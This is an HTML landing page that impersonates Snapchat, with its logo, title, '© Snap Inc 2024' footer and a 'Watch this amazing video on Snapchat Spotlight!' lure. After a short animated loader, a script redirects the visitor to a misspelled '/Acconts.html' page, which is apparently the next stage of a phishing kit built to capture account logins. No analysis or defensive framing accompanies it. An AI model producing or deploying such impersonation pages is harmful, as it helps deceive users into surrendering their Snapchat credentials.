<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no">

  <link rel="shortcut icon" href="img/faviconV2.png">
  <meta name="description" content="Watch this amazing video on Snapchat Spotlight! .">

  <title>Snapchat</title>
  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500&display=swap" rel="stylesheet">

  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-color: #ffffff;
      font-family: Arial, sans-serif;
      text-align: center;
      position: relative;
    }

    .loader {
      display: flex;
      justify-content: center;
      align-items: center;
      width: 150px;
      height: 150px;
    }

    .logo {
      width: 80px;
      height: 80px;
      background: url('img/snapchat-logo-svgrepo-com.svg') no-repeat center center / contain;
      animation: heartbeat 2.5s infinite; /* Slowed down to 3s */
    }

    .bottom-text {
      position: absolute;
      bottom: 20px;
      text-align: center;
      width: 100%;
    }

    .copyright {
      font-size: 12px;
      color: #888;
    }

    .brand {
      font-size: 18px;
      font-weight: bold;
      color: #000;
      margin-top: 9px;
      font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif
    }

    @keyframes heartbeat {
      0%, 100% {
        transform: scale(1);
      }
      25% {
        transform: scale(1.2);
      }
      50% {
        transform: scale(1);
      }
      75% {
        transform: scale(1.2);
      }
    }
  </style>
</head>
<body>
  <style>
    * {
        -webkit-tap-highlight-color: rgba(255, 255, 255, 0) !important;
        -webkit-focus-ring-color: rgba(255, 255, 255, 0) !important;
        outline: none !important;
    }
</style>
  <div class="loader">
    <div class="logo"></div>
  </div>
  <div class="bottom-text">
    <div class="copyright">© Snap Inc 2024</div>
    <div class="brand">Snapchat</div>
  </div>
  <script>
    // Redirect to the main index page after a delay (e.g., 3 seconds)
    setTimeout(function() {
        window.location.href = "/Acconts.html"; // Redirect to your main index page
    }, 2400); // 3000ms = 3 seconds
</script>
</body>
</html>
